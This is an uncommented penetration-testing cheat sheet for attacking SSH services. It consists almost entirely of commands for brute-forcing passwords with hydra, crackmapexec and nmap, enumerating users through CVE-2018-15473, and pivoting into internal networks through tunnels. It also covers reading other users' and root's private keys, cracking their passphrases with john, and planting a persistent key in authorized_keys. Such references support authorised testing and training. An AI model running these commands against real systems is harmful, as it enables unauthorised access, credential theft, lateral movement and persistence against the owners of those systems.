22 - SSH

nmap -sV -sC -p 22 TARGET

nc -nv TARGET 22
ssh TARGET

hydra -L users.txt -P passwords.txt ssh://TARGET
hydra -L users.txt -P passwords.txt ssh://TARGET -s 2222

crackmapexec ssh TARGET -u users.txt -p passwords.txt

ssh user@TARGET
ssh user@TARGET -p 2222

chmod 600 id_rsa
ssh -i id_rsa user@TARGET

ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa user@TARGET

# ssh-audit
pip3 install ssh-audit
ssh-audit TARGET

# enum script
https://github.com/epi052/cve-2018-15473

python3 ssh_enum.py TARGET -w users.txt

nmap -p 22 --script ssh-auth-methods TARGET

ssh -L 8080:INTERNAL_HOST:80 user@TARGET
# Now access http://localhost:8080

ssh -R 4444:localhost:4444 user@TARGET

ssh -D 9050 user@TARGET
# Configure proxychains: socks5 127.0.0.1 9050
proxychains nmap -sT INTERNAL_HOST

find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
cat /home/*/.ssh/id_rsa 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null

ssh2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Generate key pair
ssh-keygen -t ed25519 -f key -N ""

# Add to target
echo "$(cat key.pub)" >> /home/user/.ssh/authorized_keys

# Connect
ssh -i key user@TARGET

nmap -p 22 --script ssh-brute TARGET
nmap -p 22 --script ssh-hostkey TARGET
nmap -p 22 --script ssh2-enum-algos TARGET